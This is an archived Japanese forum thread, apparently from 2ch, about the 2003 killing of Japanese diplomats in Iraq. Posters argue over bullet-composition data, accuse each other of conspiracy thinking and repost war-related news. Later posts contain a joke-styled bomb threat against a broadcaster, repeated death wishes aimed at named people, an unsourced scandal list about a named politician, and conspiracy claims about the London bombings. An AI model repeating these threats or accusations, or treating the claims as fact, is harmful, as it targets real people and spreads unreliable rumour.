>あと成分が全く一致しないものも出ているんだが、見解を聞かせてほしい(俺は曳光弾かなと思ってる)
曳光弾もあるし、テロリストの武器ってのは片っ端から集めてあるのが普通なんで、AK以外の武器や、正規の弾薬でないものもあるだろうし。
0143国連な成しさん
垢版 |
05/07/02 22:49ID:???
旧ソ連製の弾薬だと水銀ベースの信管使うから、どうしても微量の水銀がつくんだよな。
使われた弾丸が中国あるいは自国生産ならそんなことはないわけだが。
0144国連な成しさん
垢版 |
05/07/02 22:50ID:dJcZLtKM
>>141
>車載機関銃ではこれが1000近くになる
FN MAGの有効射程距離は500mなんだけどさw
0146国連な成しさん
垢版 |
05/07/02 22:54ID:???
>まあ、NATOとは成分が一致しないなら、ソースくれって
>なんか見つかんないけどね、NATOの成分表

成分表のソースなんてきっと専門誌くらいしかないわな。
分析結果発表で「AKに一番近い」とプロがいってんだからそれを信じるしかない。
ちなみにガンマニアから言わせてもらうと東側の弾と西側の弾は全然違って当たり前。
いっしょだったら怖い(笑)それに見分けがつかないほどいっしょだったらいままで弾丸分析なんてできないよ。
冷戦期からいくらでも分析できてるんだから問題なかろう?
0147国連な成しさん
垢版 |
05/07/02 22:56ID:dJcZLtKM
>>142
>マジみてわからない?長さから違うんだよ
目視で区別がつくのは「カートリッジ長」だろw
銃弾だけでは変形してる以上区別はつきません
って、わからないか

>理系の人じゃないからわかんないかもしれないけど・・・
いや、理系だから言ってんだけど
理系なら、他の成分表も出して、その上で一致するものを提示するんだよ
でないと、自分の都合に合わないものは最初から除外できて不当な考察になってしまうからな

まあ、勉強してくれや
0148国連な成しさん
垢版 |
05/07/02 22:56ID:???
>>144
有効射程と最大射程の区別もできない馬鹿ですか?
だいいちそれは分隊機関銃の方だろ。
車載機関銃は銃身が重く長いので、有効射程および最大射程が伸びる。
連続射撃の場合は1000メートル程度の長距離で射撃することも珍しくない。
0149国連な成しさん
垢版 |
05/07/02 22:56ID:lZB7G8wE
>FN MAGの有効射程距離は500mなんだけどさw
殺傷能力は1000超えても余裕だよね。ちなみに誤射さんが言ってる事もわからんのではなんだよ。
「米軍の誤射でない!」と100パーセント言い切るのは不可能。
けれど、米軍の誤射でないと断言できない=米軍誤射につながるのは変。
弾からみても米軍の可能性はきわめて低い。
0150国連な成しさん
垢版 |
05/07/02 22:58ID:???
>>147
密度が大体分かってるから、体積から弾頭重量がわかるだろーに。
いいから写真くれよ。持ってるんだろ?
0151国連な成しさん
垢版 |
05/07/02 22:58ID:dJcZLtKM
>>146
>分析結果発表で「AKに一番近い」とプロがいってんだからそれを信じるしかない。
だから、そうなるのを見越して発表したら、お前みたいなヤツが引っかかるのよ
>ちなみにガンマニアから言わせてもらうと東側の弾と西側の弾は全然違って当たり前。
それは当たり前
で、見た目で判断できるかい?
>それに見分けがつかないほどいっしょだったらいままで弾丸分析なんてできない
逆だろ。見た目だけで成分の見分けが出来るなら、弾丸分析なんて要らない
0152国連な成しさん
垢版 |
05/07/02 23:00ID:lZB7G8wE
>理系なら、他の成分表も出して、その上で一致するものを提示するんだよ
だからいってるでしょ?成分表やデータベースを見て比較したんだろうって?
第一、新聞発表レベルで一覧表をのせるの?
それにあなたは「NATO弾との比較をやってない」みたいなとんちんかんなこと言ってたけど、
私の分析方法が理解できていれば一つ一つとの分析じゃなくて一番近いものをあてはめるっていう方法は理解できていると思うんですが・・・。
0153国連な成しさん
垢版 |
05/07/02 23:04ID:???
>だから、そうなるのを見越して発表したら、お前みたいなヤツが引っかかるのよ
お前いいかげんにしろよ?見越して発表したという根拠は?また根拠なしの陰謀論か?

まさか君が言いたいのは分析結果が信用できないってことか?
そうだとしたらソースなんてすべて意味がなくなる。
「AKに近い」というのがうそだったとでも?
陰謀厨にはソースなんていらないんだろうけどね。
0154国連な成しさん
垢版 |
05/07/02 23:04ID:dJcZLtKM
>>150
>いいから写真くれよ
ん?お前の持ってる銃弾で比べてみろよ
カートリッジから外すの忘れるなよ
0155国連な成しさん
垢版 |
05/07/02 23:06ID:dJcZLtKM
>>152
>だからいってるでしょ?成分表やデータベースを見て比較したんだろうって?
そこだよ。それは君の勝手な妄想だろ
>第一、新聞発表レベルで一覧表をのせるの?
あ?検査結果を公表したのは外交小委員会だろ。
委員会に資料を持ってこない方がおかしいだろ
0156国連な成しさん
垢版 |
05/07/02 23:07ID:lZB7G8wE
>ちなみにガンマニアから言わせてもらうと東側の弾と西側の弾は全然違って当たり前。
っていうのは成分のことを言っているんじゃないんですか?見た目じゃなくて・・・。

それとなにひとつソースを信用しないのでは議論になりませんよ。誤射さん・・・。
弾丸の成分分析をするのにNATO弾がリストに入っていないのは考えにくいですし、極論ですが、入っていないとしてもAKに近いという結果がでたことは、AKの弾だとほぼ断定できるということで間違いないでしょう。
0157国連な成しさん
垢版 |
05/07/02 23:10ID:lZB7G8wE
>そこだよ。それは君の勝手な妄想だろ
成分分析の一般的な方法を述べて「妄想」だといわれたらどーしよもないです・・・。
ということは誤射さんはソースの発表そのものを疑っているという認識でよろしいんですね?
0158国連な成しさん
垢版 |
05/07/02 23:12ID:dJcZLtKM
>>157
>成分分析の一般的な方法を述べて「妄想」だといわれたらどーしよもないです
その一般的な方法が行われていない疑惑があるんだけど
政治的配慮ってヤツで
0160国連な成しさん
垢版 |
05/07/02 23:17ID:lZB7G8wE
>その一般的な方法が行われていない疑惑があるんだけど
>政治的配慮ってヤツで
・・・・・・・・・・。もういいです。なにもかも陰謀論で片付けられたら意味が無いです。
とりあえずはその場にあるソースでなんとかするのが議論です。
残念ながらそんな考え方では私がなにをソースにあげようが「政治的な配慮」とか「陰謀」で片付けられるでしょう。
さようなら。
0161国連な成しさん
垢版 |
05/07/02 23:19ID:dJcZLtKM
>>148
>1000メートル程度の長距離
確認した
俺が間違ってた
800m。三脚有りで1800m
でもさ
ttp://www.logicsouth.com/~lcoble/dir5/ak47.txt
x39も400mなのは良いとして、最大射程2000m...
0162国連な成しさん
垢版 |
05/07/02 23:21ID:???
あーあ帰られちゃった。
せっかくひさしぶりに構ってもらえたのにね、誤射。
0164国連な成しさん
垢版 |
05/07/02 23:24ID:dJcZLtKM
>>162
>あーあ帰られちゃった。
厨房相手はまじ疲れる
0165国連な成しさん
垢版 |
05/07/02 23:26ID:???
大卒で就職できない人が相手を厨呼ばわりする権利はないよ。
ツギハギソース使うのもバカ晒すだけだからよしな。
0166国運な成しさん
垢版 |
05/07/02 23:30ID:???
まぁどちらも議論の内容と全然関係無い無意味な中傷だけどな w
中学生にまで議論に負けて負け惜しみ言ってるオサ-ンって感じかな?
0168国連な成しさん
垢版 |
05/07/02 23:33ID:dJcZLtKM
>>163
>角度45゚
それはどれも同じ条件だが
0169国連な成しさん
垢版 |
05/07/02 23:34ID:dJcZLtKM
>>166
>議論
どこが?
0170国連な成しさん
垢版 |
05/07/02 23:47ID:???
>dJcZLtKM

あんたはすべてのソースに意味がないといったも同然なんだぞ。
なんでも政治的配慮で片付けてしまうんじゃ議論にならんぞ(藁)
陰謀厨が嫌われる理由がわかってないな。
0171国連な成しさん
垢版 |
05/07/03 00:06ID:SL2bBKh6
このスレは保存の価値ありだな
0172国連な成しさん
垢版 |
05/07/03 00:24ID:SL2bBKh6
>>11はdJcZLtKMさんですか?
0173国連な成しさん
垢版 |
05/07/03 00:31ID:???
イラク系スイス人が死亡 バグダッド、米兵誤射か
http://headlines.yahoo.co.jp/hl?a=20050702-00000170-kyodo-int

 【ジュネーブ2日共同】スイス紙トリビューン・ド・ジュネーブ(電子版)は2日、
バグダッドで米兵の誤射とみられる事故があり、イラク系スイス人が死亡したと
報じた。
 同紙によると、スイス外務省も2日までに「イラク生まれでスイスの市民権を
持つ49歳の男性」が死亡したことは確認したが、詳しい身元や死亡時の状況
には言及していない。同紙も男性の死亡日時や事故の詳しい状況は不明だ
としている。
 男性はクルド人で、ジュネーブの国際高等研究大学院で博士号を取得、
クルド人問題の研究などをしていたという。
(共同通信) - 7月2日20時34分更新
0174国連な成しさん
垢版 |
05/07/03 01:35ID:???
警察長警備局長の発言より
発見された銃弾の成分分析
被甲部分
銅: 89.78%, 亜鉛: 10.22%
銅: 89.15%, 亜鉛: 10.85%
弾心
鉛: 90.14%, アンチモン 9.86%
鉛: 98.30%, アンチモン 1.70%
ttp://wakahide.com/diplomat/honpen.html
資料は以下より
ttp://wakahide.com/diplomat.html
変形した弾丸写真もありまっせ

NATO弾の被甲部は....
90% copper, 10% zinc
ttp://www.inetres.com/gp/military/infantry/rifle/762mm_ammo.html
あれ、矛盾しないよ。
Lead Coreにアンチモン入れて硬くするのは常識(比率は不明)
9mmや散弾が92:8の比率であることから、検査結果のばらつきと合わせれば、やはり矛盾しないねえ

ちなみに見つかった弾丸は2.54g ttp://wakahide.com/diplomat/04_shiryo2.pdfの24頁参照
NATOが9.72g (Lead-Antimony Coreは9.65g~9.45g ttp://www.armslocker.com/forums/printthread.php?t=31057)で、
AKが7.9gなんだけど重さで分かるって言ってたヤツさ、無理だな
比重も出してないって
0175ID: dJcZLtKM >>174
垢版 |
05/07/03 01:36ID:fm1ZW/zQ
やべ
下げちゃった
0176国連な成しさん
垢版 |
05/07/03 01:37ID:fm1ZW/zQ
そろそろ君もソース出しなよ
>>171よ、ある意味ナイスフォロー
0177国連な成しさん
垢版 |
05/07/03 01:39ID:SL2bBKh6
なんだかわからんけど、どうもです
>>11はあなたですか?
0178国連な成しさん
垢版 |
05/07/03 01:39ID:fm1ZW/zQ
>>174で書いてることはさ、過去スレ、関連スレで既出なんだけどさ
よく読んでね
0179国連な成しさん
垢版 |
05/07/03 01:39ID:fm1ZW/zQ
>>177
>>174の検証宜しく
0180177
垢版 |
05/07/03 01:40ID:SL2bBKh6
ってID変わってた。
>>171です。 俺は銃は素人だから大差ないけど。
0181国連な成しさん
垢版 |
05/07/03 01:42ID:fm1ZW/zQ
>>177
いや。なんで?
>>174はこのスレの後半にもう一回くらい貼りますので
0182177
垢版 |
05/07/03 01:45ID:SL2bBKh6
>>181
いやなんとなく文体が似てると思ったので
0184国連な成しさん
垢版 |
05/07/03 01:51ID:fm1ZW/zQ
>>160
政治的配慮っていろいろなところで出てくるのよ
年金関係でも、本来、年金法審議時に公表されなければいけない
のに年金法の強行採決の14日前にまとめられて判明していたのにも関わらず、坂口
厚生労働大臣と厚生労働官僚が隠していたことが昨年の6月22日に判明したんだけど
これも、政治的配慮ってやつなんだよ

性善説ばっかりでお役人様を見ない方が良いよ
0185国連な成しさん
垢版 |
05/07/03 01:52ID:fm1ZW/zQ
>>183
何の?
変形した銃弾なら
ttp://wakahide.com/diplomat/04_shiryo2.pdfの24頁参照
0187国連な成しさん
垢版 |
05/07/03 01:58ID:fm1ZW/zQ
>>183
>写真どこ?
ダミーカート買ってこいよ
見れば分かる
0188国連な成しさん
垢版 |
05/07/03 02:00ID:???
>>185
もっと他にもあったような気がするんだが。
写真を見た限りは先端角からいってAKっぽいけど。
0189国連な成しさん
垢版 |
05/07/03 02:08ID:fm1ZW/zQ
>>188
>他にもあったような気がする
同じ
転載だもん、多分無断の
先端角は分からんだろ
0191国連な成しさん
垢版 |
05/07/03 02:14ID:SL2bBKh6
PDFは重いッス〜
警察長警備局長の発言より
発見された銃弾の成分分析
被甲部分
銅: 89.78%, 亜鉛: 10.22%
銅: 89.15%, 亜鉛: 10.85%
弾心
鉛: 90.14%, アンチモン 9.86%
鉛: 98.30%, アンチモン 1.70%
これが
http://wakahide.com/diplomat/03_shiryo1.pdf
のP55(サムネイルだと59)ね
0192国連な成しさん
垢版 |
05/07/03 02:24ID:???
>>191
まぁ、成分分析すればって言ってた人はナンセンスだったな。
そもそもソ連製兵器に使われる銃弾の作り方は確かドイツのが基本になってて、アメリカでも基本になってる。
軍事的歴史を考えればわかるな。
鋳造に関しては、今は世界中でほとんど同じ規格が使われてるはず。
ブレット形状や弾頭重量を鑑みた方がはっきりするだろう。
ただ一つ言わなければいけないのは、7.62ミリNATOだったら当然貫通するはずの場所で、貫通がみられないということだな。
0193国連な成しさん
垢版 |
05/07/03 02:25ID:fm1ZW/zQ
>>191
そうね
ちなみに議事録の状態の時はHTMLでした
まあ、民主党はその辺は糞ですから

外務省の報告書はPDFだった
まあ、外務省はその辺は(ry
0194国連な成しさん
垢版 |
05/07/03 02:28ID:fm1ZW/zQ
>>192
>7.62ミリNATOだったら当然貫通するはずの場所で、貫通がみられない
水平方向からの銃撃の場合は、その通り。
軽防弾車であっても、でしょ

斜め上からと言う仮定で言えば、シャーシ部で跳弾となった可能性や座面を撃ち抜いた可能性が出てくる
0196国連な成しさん
垢版 |
05/07/03 02:39ID:???
>>194
ところで君は誤射説を信じてるの?
それとも武装勢力が攻撃したと思う?
よくわからん、でもよし。
最初にはっきりさせておこうよ。
0197国連な成しさん
垢版 |
05/07/03 02:40ID:SL2bBKh6
治世の不安定な地域で得られる情報はすくないよね
あたりまえだけど
0199198
垢版 |
05/07/03 02:51ID:fm1ZW/zQ
そういうことです
0201国連な成しさん
垢版 |
05/07/03 11:04ID:rYVkcJT6
>>200
>最後
はあ?
0202国連な成しさん
垢版 |
05/07/04 23:15ID:jpF8Om8I
しかしお粗末な展開
0204国連な成しさん
垢版 |
05/07/07 02:56ID:???
>>203
イラク戦争への加担は、小泉の決めたこと。
したがって、首相に責任がある。
東条英機が縛りクビになるのと同じ。
0205国連な成しさん
垢版 |
05/07/07 22:41ID:xhjPicLo
>>152 名前: 国連な成しさん Mail: 投稿日: 05/07/02(土) 23:00:00 ID: lZB7G8wE
>
>>理系なら、他の成分表も出して、その上で一致するものを提示するんだよ
>だからいってるでしょ?成分表やデータベースを見て比較したんだろうって?
>第一、新聞発表レベルで一覧表をのせるの?
>それにあなたは「NATO弾との比較をやってない」みたいなとんちんかんなこと言ってたけど、
>私の分析方法が理解できていれば一つ一つとの分析じゃなくて一番近いものをあてはめるっていう方法は理解できていると思うんですが・・・。

あぁ、恥ずかしい>>174
0206国連な成しさん
垢版 |
05/07/07 22:43ID:cWK007Rg
なにが
0207国連な成しさん
垢版 |
05/07/08 01:29ID:q.ujNuYI
>>206
プ
0208ロンドン・テロをやったのは誰か
垢版 |
05/07/08 01:35ID:???
356 名前:国連な成しさん[sage] 投稿日:05/07/08 00:46 ID:???

これらの不審なニュースが直前にあった。
なんか、日本がなかなか自衛隊派遣を決められないでいるうちに
生じた、奥・井之上の事件と同じような匂いがするのだが。


英国防省、イラク撤退を計画 英紙が報道
2005年 7月 5日 (火) 15:38
http://news.goo.ne.jp/news/asahi/kokusai/20050705/K2005070502490.html

 英国の国防省がイラクからの英軍の大規模な撤退を計画していると、
英紙フィナンシャル・タイムズ(電子版)が4日報じた。外務省などによると、
英軍は現在イラク全土に計約8500人を派遣している。同紙によると、
撤退は今後18カ月以内を予定しており、ほぼ同時期にアフガニスタン
への大規模な派遣を計画しているという。

 英軍が展開している地域のうち、シーア派が主流となっている南東部4州
については比較的治安が安定しているため、撤退は早いとみられ、今秋にも
2州で撤退が始まる可能性が高いという。この4州には、自衛隊が駐留する
ムサンナ州も含まれる。

 同紙に語った同省関係者によると、撤退の条件として、イラクの治安維持部隊
が英軍の任務を引き継ぐことが挙げられている。
0209ロンドン・テロをやったのは誰か
垢版 |
05/07/08 01:36ID:???
357 名前:国連な成しさん[sage] 投稿日:05/07/08 00:46 ID:???
米大統領、英首相にイラク戦争支持の見返り期待しないようにとクギ
2005年 07月 5日 火曜日 13:29 JST   
http://www.reuters.co.jp/newsArticle.jhtml;jsessionid=AXASN5LE3SR5ACRBAEZSFFA?type=worldNews&storyID=8972260

[ロンドン 4日 ロイター] ブッシュ米大統領はブレア英首相に対し、6―8日に開く
主要国首脳会議(グレンイーグルス・サミット)で、イラク戦争支持の見返りを期待しない
ようにとクギをさした。
 ブッシュ大統領は、英ITV1テレビとのインタビューで、「米英関係がなにか見返りを
求め合うようなものだとは考えていない。ブレア首相は私同様、平和維持と対テロ戦争
勝利にとって最良と思う方法をとることを決定した」と語った。

 英国はサミットの議長国で、ブレア首相は地球温暖化対策やアフリカ諸国の貧困撲滅に
関して、意欲的な目標を打ち出している。

 地球温暖化問題については、週末から行われているサミットに向けた土壇場の交渉で、
一定の合意に達する可能性があると報道されており、シラク仏大統領も3日、同様の
見解を示している。

 ただ、ブッシュ大統領は地球温暖化問題にはあまり積極的ではなく、専門家は、サミット
では突っ込んだ議論はなく、最低限の合意しか期待出来ないとみている。
c ロイター 2005 All Rights Reserved

359 名前:国連な成しさん[sage] 投稿日:05/07/08 01:10 ID:???
アメリカの情報機関だろ。
アルカイダなら時計塔を爆破したはず。

360 名前:国連な成しさん[sage] 投稿日:05/07/08 01:19 ID:???
撤退をほのめかしたら爆弾テロ
弱気をちょっとでも見せたらCIAとモサドにつけ込まれるだけってこと
どんな馬鹿にも伝わるメッセージ
0210国連な成しさん
垢版 |
05/07/19 21:58ID:CXHXyMg2
保守
0212国連な成しさん
垢版 |
05/07/26 03:38ID:???
ブラジル人男性射殺で謝罪=英首相   
http://headlines.yahoo.co.jp/hl?a=20050726-00000004-jij-int

 【ロンドン25日時事】ブレア英首相は25日、ブラジル人男性がテロ捜査中の
警察官に誤って射殺された事件について、「心から申し訳なく思っている」
と述べ、公式に謝罪した。訪英中のドビルパン仏首相との会談後に行った
共同記者会見で語った。 
(時事通信) - 7月26日1時8分更新


奥もこんな感じでやられたんでは?
イラク人と日本人の区別のつかない、DQN米兵に。
0214国連な成しさん
垢版 |
05/08/15 01:20ID:???
アメリカ人、イラク人、日本人

三人並べたらアメリカ人とイラク人はよう似とる
0215国連な成しさん
垢版 |
05/08/18 13:19ID:???
>>212
どうやらSO19はDQN警官の巣窟のようです

英テロ捜査で射殺された男性「不審な行動なし」2005年08月17日23時45分

 ロンドンの同時テロ事件に関連して先月22日、地下鉄駅で武装警察に射殺され
たブラジル人男性について、複数の英メディアが17日、警察の内部資料に基づき、
「男性は当初言われた不審な行動はとっていなかった」と報じた。

 この誤射事件をめぐっては、当初、警察筋の話として、殺されたジェアン・シャル
レス・デメネゼスさん(27)が捜査官の追跡に気づいてストックウェル駅の改札を
飛び越えて構内に逃走した、とされていた。また、同じように警察筋の話で、暑い日
なのに厚手のジャケットを着ていたため、自爆の恐れがあると見て頭部に銃弾を撃ち
込んだとも報道されていた。

 しかし、ITVテレビや「ガーディアン」紙が入手した内部捜査資料によると、デ
メネゼスさんは、通常通りに改札を歩いて通過し、途中で構内に置かれた無料新聞を
手に取るなど、逃亡しようとした形跡はなかった、という。またデメネゼスさんは、
薄いデニムの上着を着ており、爆発物を隠すような服装ではなかった。

 警察当局は、誤ってデメネゼスさんを射殺したことが分かった後も、「自爆の疑い
が差し迫っている場合には射殺する」との方針を取り下げていない。しかしデメネゼ
スさんの遺族や弁護士は、公開での調査を強く要求しており、今後の進展次第で、銃
器取り扱いの手続きの見直しを迫られる可能性が出ている。
ttp://www.asahi.com/international/update/0817/020.html
0217国連な成しさん
垢版 |
05/08/30 00:17ID:???
米軍がテレビクルー射殺か イラク、負傷者も拘束
http://flash24.kyodo.co.jp/?MID=YNS&PG=STORY&NGID=intl&NWID=2005082901000556

 【カイロ29日共同】ロイター通信によると、バグダッド西部で28日、ロイターテレビ
のイラク人音声担当クルー、ワリード・ハレドさん(35)が頭などを撃たれて死亡した。
イラク人カメラマンも負傷した上、米軍に拘束された。警察当局は、2人は米軍に
銃撃されたとしているが、米軍は調査中としている。
 米軍はカメラマンの拘束を認めた上で、理由について「カメラマンの証言に
矛盾があるため」としている。事件当時、2人は車で取材に向かっていた。
 米軍は「バグダッド中心部で、イラク警察の車列に対するテロ攻撃に反撃した」
「民間人1人が死亡し、1人が負傷した」としているが、この2人がハレドさんらか
どうかは不明。米国のハリルザド駐イラク大使は「間違いは時々起きる」と述べた。
0219このテロをやったのは誰か 誤射どころじゃねえぞ
垢版 |
05/10/24 01:47ID:???
旧政権幹部の担当弁護士、頭部撃たれ遺体で発見 イラク
2005.10.21
Web posted at: 20:01 JST
- CNN/AP
http://cnn.co.jp/world/CNN200510210018.html

バグダッド――バグダッド警察などによると、バグダッドで拉致された旧政権幹部
担当弁護士の遺体が21日午前(日本時間同日夕)、同市内のモスク(イスラム
礼拝所)近くの路上で発見された。頭部を銃弾一発で撃たれていたという。

遺体で見つかったのは、バンダル元革命裁判所長の弁護士サドゥーン・ジャナビ氏。
同氏は、バグダッドの特別法廷で19日に始まった住民虐殺をめぐる裁判で、
フセイン元大統領と共に被告の1人となったバンダル氏の弁護を担当。法廷では
弁護団を代表して、「証拠を調べる時間が十分に与えられなかった」と不満を申し
立てた。

ジャナビ氏は20日夜、バグダッド北部の事務所から武装グループに連れ去られ、
行方不明となっていた。警察によると、犯人グループは日本製のトラック2台に
乗っていた。

裁判は弁護団の要求を受け、11月末まで休廷することが決まったが、ジャナビ氏
の死亡により、再開が遅れる可能性も出てきた。
0220国連な成しさん
垢版 |
05/12/21 18:14ID:S/TVDXs.
一発だけなら誤射かもしれない
0222ごるごるもあ ◆753Z/RLFiY
垢版 |
06/05/20 22:27ID:N2XYGXVM
            、     
           ) |   
         ( ノノ   
       , --" - 、 
スチャ    / 〃.,、   ヽ 
  ∧、   l ノ ノハヽ、  i 
/⌒ヽ\ i | l'┃ ┃〈リ  我々の要求は、皇室関係の放送禁止コードの全解除だ。
|( ● )| i\从|l、 _ヮ/从  明日琉球朝日放送を爆破する。
\_ノ ^i |ハ  ∀ \ 
 |_|,-''iつl/  †/ ̄ ̄ ̄ ̄/
  [__|_|/〉 .__/ 魔 法 /__
   [ニニ〉\/____/ 
    
■■■■■■■■■■■■■■■■■ネタバレ■■■■■■■■■■■■■■■■■
琉球民族差別という伝統が失われると、伝統という重みに立脚して存続してきた天皇制そのものが揺らぎかねない
■■■■■■■■■■■■■■■■■ネタバレ■■■■■■■■■■■■■■■■■
0223国連な成しさん
垢版 |
06/05/21 10:10ID:.KJQ08b6
アメリカ軍な事件を大きくする為にたっているのさ、日本の反応を見る為に。
0224国連な成しさん
垢版 |
06/05/21 12:31ID:LU3uV826

★佐藤ゆかりの黒い噂★

▼グレーゾーン金利の自由化を目指し、サラ金団体と癒着?
▼巨額の脱税をした学校法人と癒着?補助金カットを妨害か?
▼人殺しした人が事務所に出入りしてるの?
http://human5.2ch.net/test/read.cgi/uwasa/1147495812/95-98
0225国連な成しさん
垢版 |
06/05/23 06:50ID:WFNIMisk

なんだかんだいって、原爆というものは存在する。
だから、つべこべいってもむだ。負けは負け。
0226国連な成しさん
垢版 |
06/05/25 03:09ID:CwEp1eqQ
公金くすねて
貴族気取りの
盗賊外務官僚ばーん
楽しいな
(゚Д゚)
あぁぽむぽむ
0227国連な成しさん
垢版 |
06/05/25 09:24ID:HcoE4cng
拉致行為国家、米国、北朝鮮。
アメリカ軍、CIA、秘密輸送作戦(民間機使用)。
0228国連な成しさん
垢版 |
06/05/25 10:03ID:A.irF2f2
>>1 
「フセインを穴倉で発見したのも演出」
の真相を教えてつかわさい! 
0229国運な戌しさん
垢版 |
06/05/25 18:49ID:???
>>228
ほいよ。
h ttp://kimurasanko.fc2web.com/hitokoto/20040121.html

当初からしばらくはもっと色々あったんだけどなぁ。
0230国連な成しさん
垢版 |
06/05/26 09:37ID:Ap54M0u2
>>229 
サンクス! 
0231国連な成しさん
垢版 |
06/09/10 00:01ID:w3xM0w4A
質問主意書 質問第四六号
イラク開戦の根拠をめぐる小泉内閣総理大臣の認識に関する質問主意書
右の質問主意書を国会法第七十四条によって提出する。平成十八年四月七日
喜 納 昌 吉   参議院議長 扇   千  景 殿
イラク開戦の根拠をめぐる小泉内閣総理大臣の認識に関する質問主意書
二〇〇三年、アメリカのブッシュ政権がイラク開戦に踏み切った最重要根拠
は「大量破壊兵器の存在」であった。しかし、大量破壊兵器は発見されず、
その報告を受けたブッシュ大統領は、判断の誤りを認めて謝った。
 小泉内閣総理大臣は開戦直前に、大量破壊兵器の存在に関するアメリカ政
府の発表をうのみにして、真っ先にイラク攻撃を支持したが、大量破壊兵器
が存在しなかったという点に関する判断の誤りをいまだに認めていない。日
本の主権を代表する内閣総理大臣が、このような重大な誤りを認めないので
は、民主主義は根幹から歪んでしまう。小泉内閣総理大臣は一時も早く誤り
を認めるべきである。そこで、以下質問する。
一 小泉内閣総理大臣は今年九月に勇退すると公言してきたが、勇退前に、
イラク開戦の根拠の誤りを認める意思はないか明らかにされたい。その意思
がない場合は、その理由を詳しく示されたい。
二 最近、台湾を「国」と呼んだり、靖国神社への「天皇の参拝が一番」な
どと言う小泉内閣の閣僚の乱暴な発言が目立っている。これは、小泉内閣総
理大臣がそのような発言を厳しくただすことをせず、あえて問題視しないよ
うな態度を取っていることが原因の一つと言える。
 イラク開戦の根拠に関する認識の誤りを認めず、さらには「沖縄密約事件」
の密約の存在を否定し続ける内閣総理大臣に、閣僚の問題発言を抑え込む力
量もないのかと懸念せざるを得ない。この点について、小泉内閣総理大臣の
見解を明らかにされたい。右質問する。
0234国連な成しさん
垢版 |
06/09/15 12:57ID:???
金正日死ね金正日死ね金正日死ね金正日死ね金正日死ね金正日死ね金正日死ね金正日死ね
フセイン死ねフセイン死ねフセイン死ねフセイン死ねフセイン死ねフセイン死ねフセイン死ねフセイン死ね
ビン・ラーディン死ねビン・ラーディン死ねビン・ラーディン死ねビン・ラーディン死ねビン・ラーディン死ね
高遠菜穂子死ね高遠菜穂子死ね高遠菜穂子死ね高遠菜穂子死ね高遠菜穂子死ね高遠菜穂子死ね高遠菜穂子死ね
0235国連な成しさん
垢版 |
06/10/30 00:05ID:HAeXurEU
奥氏は米軍に撃たれたのではなく、左脇腹に刃物による刺し傷があり、別の場所で殺されたのです!!!
http://www.asyura2.com/0401/war48/msg/706.html
投稿者 救国の草莽の志士 日時 2004 年 2 月 27 日 10:56:31:fzrYJ5Wj4Dt36


(回答先: 国会論駁!!!外交官は米軍に撃たれた [JANJAN] 投稿者 なるほど 日時 2004 年 2 月 26 日 21:33:46)
0236もうたくさん▼佐藤ゆかりの一年めのスキャンダル集▼落選運動コピペ
垢版 |
06/10/30 00:13ID:???
落選運動 小泉チルドレン佐藤ゆかりのスキャンダル この一年間のまとめ 総理に嫌われ秘書らに逃げられ代議士失格!
http://society3.2ch.net/test/read.cgi/soc/1151588042/l50  ↑国会議員は政治資金が無いなら株を買え!
●公募中、コネがあるサイタマ15区の選考落ちで安部氏に「喧嘩売ってんのかよ」と暴言し、岐阜1区左遷。
★2005年8-9月、『W不倫/不倫メール500通疑惑』発覚。また、所得が無ければ株を買えと暴論。落選。
★9月、当選直後に選挙区内の有権者宅を個別訪問し市民団体から公選法違反の告発。また、審議中の居眠りも発覚。
●11月、「子育ては自助努力で行え」、「私は女性優遇枠ではない」とワセダで暴言。隣席のさつき氏唖然。
★2006年4-5月、グレーゾーン金利などサラ金問題の最中、チワワの行政処分直後にサラ金団体で講演し癒着判明。アナリスト時代からサラ金に投資を勧め、某サラ金とは仲が良いことが発覚。
★同、『サイタマの脱税学校法人癒着・補助金くちきき疑惑』発覚。2006年冬、学園が脱税を指摘される直前に講演。サイタマから出馬の動機や、学校教育に口を出したがる真相が発覚。
●5月、岐阜の民主候補の公約「ふるさとお返し税」をパクリ、更に自身のアイデアと総裁候補に嘘を吐いたとされる『疑惑のふるさと税』発表。また、ゆかり組東京事務所に人殺しの8氏が出入りしているとの指摘がなされる。
●6月、ヤマクク派同僚と髪なでなで不倫デートが発覚。同僚のセクハラだと言い逃れするが、TVでおどおどした様子が放送され非難を受ける。安陪氏にもうないな?と念を押され、後に「あの女はまたやる」と疎んじられる。
●6月、紛糾した審議中に同僚と遊びで写メール激写!「(国会で)初めて撮りました」とタイゾー並みの言い訳。
★7月、岐阜で起こった1億5千万円の出資詐欺に加担が発覚。その詐欺師を後援会の宴会に呼んだことまでわかる。
★7月、長良川花火大会・公選法違反疑惑発覚。花火大会の招待券を選挙区内の産婦人科医に譲渡した疑惑。削除依頼まで出る。
●7月、TB$番組朝ズバの赤坂億ション議員宿舎問題で「議員は贅沢させないと企業と癒着する」と暴言。税金4000万貰ってもまだ不足かと反発され番組降板。しかも宿舎には住まないと明言しながら住んでいた!
●9月、総裁選で猟官。世論の反発を受け断念。また秘書が相次いで辞めたことが発覚。公募中の暴言で総理にも嫌われていた。
0237国連な成しさん
垢版 |
06/12/05 16:30ID:cO2tTzTs
奥氏は米軍に撃たれたのではなく、左脇腹に刃物による刺し傷があり、別の場所で殺されたのです!!!
http://www.asyura2.com/0401/war48/msg/706.html
投稿者 救国の草莽の志士 日時 2004 年 2 月 27 日 10:56:31:fzrYJ5Wj4Dt36
0238国連な成しさん
垢版 |
07/01/13 08:42ID:YQ4Hvcag
雅子妃の病、きっかけは奥参事官の死 日本メディアが黙殺した英紙報道 「二人は親密な友人だった」(ベリタ)
http://www.asyura2.com/07/war87/msg/876.html
投稿者 近藤勇 日時 2007 年 1 月 12 日 22:54:07: 4YWyPg6pohsqI

雅子妃の病、きっかけは奥参事官の死 日本メディアが黙殺した英紙報道 「二人
は親密な友人だった」
http://www.nikkanberita.com/read.cgi?id=200607080401426
2006年07月08日掲載


【東京8日=高瀬宏】英紙タイムズは今年6月4日号(日曜版)で日本の皇室、特
に皇太子妃の雅子さんについてセンセーショナルな特集記事を報じていた。日本の
大手メディアが「黙殺」したマイケル・シェリダン氏執筆の同記事は、雅子さんが
なぜ、2003年末から精神のバランスを崩し、鬱状態に陥ったかについて核心に
迫る「ある事実」を明らかにしている。雅子さんの心の病は、03年11月に起き
たイラクの日本人外交官殺害事件がきっかけだったという内容で、日本のメディア
関係者の間でもひそかにささやかれていた「真相」だ。
0239国連な成しさん
垢版 |
07/01/30 03:58ID:28j/vFVM
ベイエリア在住町山智浩アメリカ日記 - イラク無差別射撃ドライブのBGMはエルビス
http://d.hatena.ne.jp/TomoMachi/20070122

